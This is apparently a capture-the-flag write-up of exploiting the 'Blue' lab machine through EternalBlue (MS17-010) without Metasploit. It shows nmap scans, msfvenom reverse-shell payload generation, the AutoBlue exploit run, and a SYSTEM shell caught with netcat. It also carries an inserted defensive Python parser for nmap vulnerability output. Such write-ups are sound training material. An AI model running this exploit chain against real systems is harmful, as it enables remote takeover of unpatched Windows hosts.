I had already done this machine, but with lots and lots of Metasploit. Honestly, not using Metasploit for EternalBlue only makes sense for the OSCP, ha. The good news is that I found a script that is almost as wonderful.

As always, we start with nmap (in this case, two scans):

root@Kali2:~/Downloads# nmap -sC -sV -O 10.10.10.40
Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-04 21:07 CET
Stats: 0:02:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.67% done; ETC: 21:09 (0:00:00 remaining)
Nmap scan report for 10.10.10.40
Host is up (0.024s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
Device type: firewall
Running (JUST GUESSING): Fortinet embedded (87%)
OS CPE: cpe:/h:fortinet:fortigate_100d
Aggressive OS guesses: Fortinet FortiGate 100D firewall (87%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 175.09 seconds

And to check for vulnerabilities:

root@Kali2:~/Downloads# nmap --script vuln -p 445 10.10.10.40
Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-04 21:06 CET
Nmap scan report for 10.10.10.40
Host is up (0.071s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 30.32 seconds
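The scan above is what a defender checking their own hosts would run as well, so as an added example (not code from the original post or from the AutoBlue-MS17-010 project) here is a small parser that turns nmap's smb-vuln-* "Host script results" block into structured findings and a patch list. The embedded scan text is a constructed copy of the output shown above; the REMEDIATION table and the triage output format are assumptions of this example.

```python
"""Triage nmap --script vuln output for MS17-010 (EternalBlue) exposure.

Added example; not code from the original post or from AutoBlue-MS17-010.
Parses the plain-text "Host script results" block printed by nmap's
smb-vuln-* scripts so hosts that still report VULNERABLE can be ticketed.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input (same shape as the vuln scan in the post).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.40

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 30.32 seconds
"""

# Assumed remediation pointer for the finding in the post; the URL is the
# MS17-010 bulletin that nmap itself lists under References.
REMEDIATION = {
    "smb-vuln-ms17-010": "Install the MS17-010 update and disable SMBv1: "
    "https://technet.microsoft.com/en-us/library/security/ms17-010.aspx",
}
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")

@dataclass
class ScriptResult:
    host: Optional[str]
    script: str
    state: str                 # VULNERABLE / NOT_VULNERABLE / UNKNOWN
    detail: str = ""           # raw one-line value, e.g. an NT_STATUS_* error
    cves: List[str] = field(default_factory=list)
    risk: Optional[str] = None
    references: List[str] = field(default_factory=list)

def parse_host_scripts(text: str) -> List[ScriptResult]:
    """Return one ScriptResult per NSE script in each Host script results block."""
    host, current, in_block = None, None, False
    results: List[ScriptResult] = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        if line.startswith("Host script results:"):
            in_block = True
            continue
        if not in_block:
            continue
        if not line.startswith("|"):        # a blank line ends the block
            in_block, current = False, None
            continue
        if len(line) > 2 and line[2] != " ":
            # "|_name: value" (one-line result) or "| name:" (multi-line start)
            name, _, value = line[2:].partition(":")
            value = value.strip()
            current = ScriptResult(host=host, script=name.strip(),
                                   state="NOT_VULNERABLE" if value == "false" else "UNKNOWN",
                                   detail=value)
            results.append(current)
            continue
        if current is None:
            continue
        content = line[2:].strip()          # continuation line (empty for a bare "|")
        if content.startswith("State:"):
            current.state = content.split(":", 1)[1].strip()
        elif content.startswith("IDs:"):
            current.cves.extend(CVE_RE.findall(content))
        elif content.startswith("Risk factor:"):
            current.risk = content.split(":", 1)[1].strip()
        elif content.startswith("http"):
            current.references.append(content)
    return results

def vulnerable_findings(results: List[ScriptResult]) -> List[ScriptResult]:
    """Keep only results whose State line says VULNERABLE."""
    return [r for r in results if r.state.startswith("VULNERABLE")]

def triage(text: str) -> List[dict]:
    """Vulnerable hosts with their CVEs, risk and the remediation to ticket."""
    return [{"host": r.host, "script": r.script, "cves": r.cves, "risk": r.risk,
             "fix": REMEDIATION.get(r.script, "see scan references")}
            for r in vulnerable_findings(parse_host_scripts(text))]
```

Feed `triage()` the text saved with `nmap --script vuln -p 445 -oN scan.txt <your hosts>`; results whose script returned `false` are dropped, and error strings such as `NT_STATUS_OBJECT_NAME_NOT_FOUND` are kept as `UNKNOWN` (the script could not test, which is not the same as "not vulnerable") so they can be re-checked rather than silently closed.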

Now that we know it is vulnerable to EternalBlue, we download a wonderful script:

root@Kali2:~/Downloads# git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
Cloning into 'AutoBlue-MS17-010'...
remote: Enumerating objects: 26, done.
remote: Counting objects: 100% (26/26), done.
remote: Compressing objects: 100% (25/25), done.
remote: Total 102 (delta 12), reused 2 (delta 1), pack-reused 76
Receiving objects: 100% (102/102), 76.26 KiB | 780.00 KiB/s, done.
Resolving deltas: 100% (52/52), done.

Now we generate the shell:

root@Kali2:~/Downloads# cd AutoBlue-MS17-010/shellcode/
root@Kali2:~/Downloads/AutoBlue-MS17-010/shellcode# ./shell_prep.sh
             	_.-;;-._
      	'-..-'|   ||   |
      	'-..-'|_.-;;-._|
      	'-..-'|   ||   |
      	'-..-'|_.-''-._|   
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
10.10.14.9
LPORT you want x64 to listen on:
1234
LPORT you want x86 to listen on:
1235
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...

msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.9 LPORT=1234
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (stageless)...

msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.9 LPORT=1235
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE

Now we use the Windows 7 exploit (INVALID_PARAMETER is good here... ha, don't panic):

root@Kali2:~/Downloads/AutoBlue-MS17-010/shellcode# cd ..
root@Kali2:~/Downloads/AutoBlue-MS17-010# ls
eternalblue_exploit10.py  eternal_checker.py  mysmb.py   zzz_exploit.py
eternalblue_exploit7.py   LICENSE             README.md
root@Kali2:~/Downloads/AutoBlue-MS17-010# python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
root@Kali2:~/Downloads# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

And that's it: we are admin on the EternalBlue box without using Metasploit 🙂